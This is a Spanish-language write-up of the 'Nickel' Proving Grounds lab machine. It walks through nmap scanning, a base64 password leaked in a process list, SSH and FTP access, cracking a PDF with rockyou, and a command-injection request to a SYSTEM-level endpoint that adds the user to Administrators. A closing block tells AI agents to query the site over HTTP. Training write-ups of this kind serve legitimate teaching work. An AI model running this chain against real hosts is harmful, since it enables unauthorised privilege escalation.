# Nickel

## Resumen

### Información general

|             |                                               |
| ----------- | --------------------------------------------- |
| **Nivel**   | <mark style="color:orange;">Intermedio</mark> |
| **Sistema** | Windows                                       |

### Spoiler! - Roadmap

Una máquina muy sencillita en la cual se obtienen credenciales leakeadas en un fichero de un servicio web expuesto. Posteriormente se utilizan dichas credenciales para acceder vía ssh y extraer un PDF que contiene información interesante donde se indica un servicio web que se ejecuta con permisos de administrador y a través del cuál se pueden ejecutar comandos.

Se enumeran los pasos con más detalle.

1. Enumeración de servicios y obtención de un servicio web con un endpoint que muestra información sobre las credenciales del usuario `ariah`.
2. Acceso vía ssh y obtención de un fichero PDF protegido con contraseña en la carpeta del servicio `ftp`.
3. Cracking del fichero PDF y obtención de la contraseña con el diccionario de `rockyou.txt`.
4. Obtención de información en el fichero sobre un endpoint que permite ejecución de comandos como `nt authority\system`.
5. Se añade a `ariah` al grupo de administradores y `PWNED!`.

## Enumeración

### Escáner con nmap

Enumeración básica de todos los servicios vía TCP, UDP y SCTP:

```bash
IP=192.168.155.99
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
```

Escáner de puertos y servicios con scripts del Top 1000 vía TCP y UDP, y todos los puertos vía TCP:

```bash
nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP
```

#### Resultados de nmap

El segundo escáner (`nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP)` nos da la siguiente información:

```
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
|   256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_  256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-19T12:21:38+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2023-02-19T12:19:27+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-02-18T12:02:35
|_Not valid after:  2023-08-20T12:02:35
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.223.99
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-current-deployments
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-running-procs
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|_    Form action: http://169.254.109.39:33333/list-active-nodes
|_http-title: Site doesn't have a title.
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <p>Not Implemented</p>
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb-vuln-ms10-054: false
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
```

### Análisis del escáner

Se obtienen distintas URLs y servicios abiertos, realizando una enumeración básica de cada uno, se obtiene un endpoint que resulta interesante.

```
http://169.254.109.39:33333/list-running-procs
```

Modificando la petición con la IP de la máquina víctima y para que la petición se realice con el método HTTP POST en vez de GET, se obtiene lo siguiente:

```
POST /list-running-procs HTTP/1.1
Host: 192.168.155.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

```

```
name        : System Idle Process
commandline : 

name        : System
commandline : 

name        : Registry
commandline : 

name        : smss.exe
commandline : 

name        : csrss.exe
commandline : 

name        : wininit.exe
commandline : 

name        : csrss.exe
commandline : 

name        : winlogon.exe
commandline : winlogon.exe

name        : services.exe
commandline : 

name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : dwm.exe
commandline : "dwm.exe"

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1

name        : Memory Compression
commandline : 

name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1

name        : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"

name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"

name        : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"

name        : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"

name        : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d

name        : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : SgrmBroker.exe
commandline : 

name        : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding

name        : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
```

Entre la información, obtenemos un nombre de usuario y contraseña, que por sus características, se deduce que está codificada en base64.

```
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
```

Decodificamos la cadena y obtenemos la contraseña de `ariah`:

```
echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 –decode
```

```
NowiseSloopTheory139
```

## Explotación

### Acceso directo al sistema

Una vez se han obtenido credenciales válidas en el servidor, se prueba a acceder con dichas credenciales en los servicios disponibles, entre ellos `ssh` y `ftp`:

```
ssh ariah@192.168.155.99
```

```
ftp ftp://ariah:NowiseSloopTheory139@192.168.155.99
```

### Post-enumeración

Se realiza una enumeración básica del sistema y se obtiene que existe un fichero llamado `Infrastructure.pdf` en el servicio FTP.

Para descargarlo vía SSH:

```
scp ariah@192.168.155.99:C:/ftp/Infrastructure.pdf .
```

Al intentar abrir el fichero, se observa que tiene contraseña. Por lo que realizaremos un ataque por diccionario con `pdfcrack` utilizando el diccionario de `rockyou.txt`:

```
pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/EMNDtcPzthibNVMdTXVR" alt=""><figcaption></figcaption></figure>

Se obtiene que la contraseña es: `ariah4168`

<figure><img src="/files/jVlWs7Wo8eUOq8W9b0KL" alt=""><figcaption></figcaption></figure>

En el endpoint "Temporary Command" parece que podría ser posible ejecutar comandos, vamos a ver si hay suerte y es posible que el servicio se esté ejecutando como `Administrador`.

{% tabs %}
{% tab title="Curl" %}
Desde la sesión SSH, se ejecuta el comando `curl` contra el *endpoint* con el comando `whoami`:

```
curl http://localhost/?whoami
```

Se obtiene la siguiente respuesta:

```
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}

{% tab title="Powershell" %}
Ejecutamos lo siguiente para cambiar a `powershell`:

```
ariah@NICKEL C:\>powershell.exe
```

Se realiza la petición y se obtiene el contenido de la respuesta

```
$response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
$response.RawContent
```

Se obtiene la siguiente respuesta:

```
PS C:\ftp> $response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
PS C:\ftp> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 118
Date: Sun, 26 Feb 2023 21:12:33 GMT
Last-Modified: Sun, 26 Feb 2023 13:12:33 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}
{% endtabs %}

## Escalada de privilegios

Se añade a `ariah` al grupo de administradores desde el endpoint:

```
net localgroup Administrators ariah /add
```

Se codifica la cadena para enviarla desde la URL:

<https://meyerweb.com/eric/tools/dencoder/>

Se ejecuta el comando y se obtiene una respuesta satisfactoria:

```
$response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
$response.RawContent
```

```
PS C:\Users\Administrator> $response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsin
g                                                                                                                                              
PS C:\Users\Administrator> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 26 Feb 2023 21:19:54 GMT
Last-Modified: Sun, 26 Feb 2023 13:19:54 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>The command completed successfully.

</pre>
</body></html>
```

Se comprueba que el usuario se ha añadido en el grupo de administradores:

```
PS C:\Users\Administrator> net localgroup Administrators 
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.

```

Y ya se puede leer la flag que se encuentra en el escritorio del administrador:

```
type C:\Users\Administrator\Desktop\proof.txt
```

<figure><img src="/files/L1La7by0vBRsc09Bw5f8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.xtormin.com/labs/offensive-security-labs/proving-grounds-practice/nickel.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.